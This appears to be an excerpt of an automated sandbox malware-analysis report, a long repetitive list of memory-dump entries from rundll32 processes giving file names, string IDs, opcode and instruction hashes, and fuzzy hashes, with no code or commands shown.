• Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b6f7246223fc19e9ddea3039315ca5d55700ff7e7107a782ad5233400abf327b
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: c53ff0b480742851962ed03915eda8699192a88f3cdcb73f5d2f85fe273150c7
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6f7246223fc19e9ddea3039315ca5d55700ff7e7107a782ad5233400abf327b
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A312C21B293548BDBA52BB5981477E7FEBCF85350F0684BADA42CB38ADD64CD0143A1
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c9df575b7ab0c5f562d31e3220a944ff4c5265da29d96e3e6270b96fd8cc1311
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 407aca5bea6721d6fc444c443ea210f1d923d59486c75f1c9e769a832428f052
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9df575b7ab0c5f562d31e3220a944ff4c5265da29d96e3e6270b96fd8cc1311
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3313630B192449FD7956B398C203AE7FF69FCA310F16846EDA42EB386CD344C0483A1
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: cf20cdb563b5f7ce366908722c555f10db2570c9692b792a8fb80a0845e38ee0
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8c5e4dad6ac2fe90592347bfa3e3cd300ec33302c31f201380f907878ce80880
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf20cdb563b5f7ce366908722c555f10db2570c9692b792a8fb80a0845e38ee0
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FEE06570C19204DFD794DFA99501696BFF1FF5531472186BEC888E2214E7328603CB91
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: fff719478d2746f0e94314e49f79d0bf8f5c2ac4518901a9fb4e76175a80817e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 429fcce9b3cbc51af4da071f3b0649c1639e0349b3787b03a2ac1ce20c0b2a86
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fff719478d2746f0e94314e49f79d0bf8f5c2ac4518901a9fb4e76175a80817e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE510330B21205CFC750CFA8D89496ABBF5FF48304B1681A6E618DB366DB71DE41CB90
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: d671758dea27dc7dd3eaed0a25d4d98d9a279cd3004bd6ef1d1622fbefdfd986
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 97c90b62624e55994cd5e35e24525509473d21e5f8ee9f809fd7b0d2369225a1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d671758dea27dc7dd3eaed0a25d4d98d9a279cd3004bd6ef1d1622fbefdfd986
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A413A75B101149FCB54DFA8D98099EBBF6FF88710B118169EA05EB364DB31DD41CBA0
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8318fe01b0c7433d0f19970d2af1470a4d78acb2628372785d7422a4c84ed82c
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 227cb1b3d7064dd1b9985e6c02897fda494ae2edefade52078af48a2b101c602
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8318fe01b0c7433d0f19970d2af1470a4d78acb2628372785d7422a4c84ed82c
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03214931A65314DFC3412BEAA8243EA7FA8DF42320F168877EF9896251DD24898583A1
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 984403599e2024d09bc91f97e17221ed61126afb1d643fd32fcb6cb1898f7f5d
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 66679cdaa053c8f0f7f712fd345a4be5ed40f3f0baa7245509ef6f1b44ad680c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 984403599e2024d09bc91f97e17221ed61126afb1d643fd32fcb6cb1898f7f5d
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51213631B10354DBDB509F69DC50AEABBEADF88214F05407ADA42D7349EE70C906C7A0
Memory Dump Source
• Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 273cc52bc2263c1ba172c4df78d1f07bcd72c78e9b6580bddb82166d42c0b4b4
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D018431A10118B7E764AB6989647AF7AAA9B88604F12402DE611B7384CE754C0487F1
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 48c36b1e87ef9556a8442c4f48ad9943352750a4a0c781bc3a6bc1d07d17716a
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: fde8e5fcd763f0ad1ed25740750d89b0d1333dd1599ffed9b3a6379d16d92825
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48c36b1e87ef9556a8442c4f48ad9943352750a4a0c781bc3a6bc1d07d17716a
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B115135A04205EFCB44DF69E858AA97BB7EF8C314F145019E60AE7394CF769C45CB90
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1682875777.000000000481D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0481D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_481d000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 035eb27ef06bd27eb73c6724b7701178f938df6ea1f4472ff5dd8d1397b572f7
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6b8708efee13f2b8211d0f9c9a029157f658cba5a3b2e5facec42b68c1c1fb7f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 035eb27ef06bd27eb73c6724b7701178f938df6ea1f4472ff5dd8d1397b572f7
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E601F7715083049AE7109E29E984767BFDCDF41324F08CA2BED488A256C279B841C6B1
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1682875777.000000000481D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0481D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_481d000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2e1ce52619778c9120df305b2a86829937c3e65b7e7147578bcc49e1c7e87010
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e054b6acfe9e05cf2e7da4fd610baee1ce8b98528b2b67bffed21e74f7184025
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e1ce52619778c9120df305b2a86829937c3e65b7e7147578bcc49e1c7e87010
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4001526140D3C09ED7124B259894752BFB4DF53224F19C5CBD9888F1A3C2696849C772
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 47fa99edd87b4dbf41f26a94f06e371478957475301e7eccfba8598c3e6b3b14
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 160f8597c4142934d90aa9a98d280ea49fd9c36e76e3c82b43bdb335afd8c7be
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47fa99edd87b4dbf41f26a94f06e371478957475301e7eccfba8598c3e6b3b14
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5401F930A2A345DFC7095F796D351173FEADEC521430A18AAC305CF2A6E9258448CBE1
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a0cee6e61694440bcba1cd5b6ebdb2cbe14c8f1ffa621adc3854a4817a178702
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5e36d930de80e595e167b883011edd1013580ce004f0372ccc34622106750c34
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0cee6e61694440bcba1cd5b6ebdb2cbe14c8f1ffa621adc3854a4817a178702
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79F0F630A55205DFC7499FBAA9251177FDBEFC5218306186EC745CF2A5EA358444CBD0
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0aa828ce6e99f62fd275ff536cfa48833704376cb2a016acc5804b59e253b8cc
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5726b13587c54233f7a242704dfe97eb30c06cf727e0d29f8e32a8c3ba2da8c3
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0aa828ce6e99f62fd275ff536cfa48833704376cb2a016acc5804b59e253b8cc
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3F0A735725310578BB85F97A8C4F3B77DAEFC8750B068029EF0883244DA24CA0195B4
Memory Dump Source
• Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731356894.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6e30000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: \;kq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-699045553
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: mq$$&lq$(_kq$4'kq$4'kq$4'kq$4'kq$4ckq$4ckq$@bkq$|-lq$$kq$$kq$ckq$ckq$mq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2673231897
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: mq$$&lq$(_kq$4'kq$4'kq$4'kq$4'kq$4ckq$4ckq$@bkq$|-lq$$kq$$kq$ckq$ckq$mq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2673231897
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • String ID: (Apq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-1034389350
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b923098449e1e34ba84bf40d9fee7ca998bf800f335f878b4d557f82384d5495
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: ea7bdc0b865539039b564c4f8456c81138b092bd5410601df0f0add8398aeaf3
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b923098449e1e34ba84bf40d9fee7ca998bf800f335f878b4d557f82384d5495
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEC17E30F102199FDB54EFA9C954AAEBBB6BF88200F144429D902EB364DF34DC46CB90
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6c81ce1d0f29808758ae53434a5c227dad9c266a222c5f170f264888c4746635
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 53bce2cf4957ac18fdc34cca813bd81f1462d0aac05447e7e8f41958fb4c5d14
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c81ce1d0f29808758ae53434a5c227dad9c266a222c5f170f264888c4746635
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4E13730A0035A8FCB45DFA9C898A9DBBF2BF89300F158195D809AF3A5DB70ED45CB50
                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06E39FF8
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731356894.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6e30000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID: 6842923-0
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 26c4d572b9f5cb2181829d1aa3b7136b2e72fc2d3e0787800e771817821766f7
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 450a84cf41291e4e554dfcc969b5dbb679749a0303be615b1bfeab72f364afb2
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26c4d572b9f5cb2181829d1aa3b7136b2e72fc2d3e0787800e771817821766f7
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67116A36E043148FDB20CA3CD5487ECB7B1EB88328F149639D951A32A0FA369888CF50
                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06E39FF8
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731356894.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6e30000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID: 6842923-0
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 47d1d3fa40ad7408d9fdfa23114d6178e7f5ab48621848a5b7ac43ff6066a4ed
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3c17f54cd080f366132debd06292948056875c6ed4145204ac67ce5a32d81576
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47d1d3fa40ad7408d9fdfa23114d6178e7f5ab48621848a5b7ac43ff6066a4ed
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55110831D053559FEB20CB38C9487DDB7B2DB49268F145568D991631A0FA359888CF90
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 39ef00976033864a3630a545fd876484de43f0e12c24e37d23568094e4d0ae59
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8828019b25cd262b600507b1e0a382fd9be1b402ace5dee40933818678312d21
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39ef00976033864a3630a545fd876484de43f0e12c24e37d23568094e4d0ae59
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0718335B10214CFEB54ABB5C954B7E7BA7EFC8200F148029E906EB3A4DE31DC428B90
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2f0d15ed18520fafdac0a40877a976ceff1f0aa3afe8c85eca94762d8c490f59
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: fe88a0b9078c815b759682cf54b81f977d50ccaa9a8faa3a01396ac15abaf2e1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f0d15ed18520fafdac0a40877a976ceff1f0aa3afe8c85eca94762d8c490f59
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC716D70A103189FDB45DBE4D8A0ADEBFB2FF89310F104429D5166B3A0DE356D45EBA1
                                                                                                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
Similarity
• API ID:
• String ID: (oq
• API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 764cbec8f79ecba3ff3e2e858e544b1ebc54e8ea44c9d01a22b8442b51eff442
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 170649ca4cd5e623bff0571cad2e4816dc3ff63fc3f98c35630387e0b6db303b
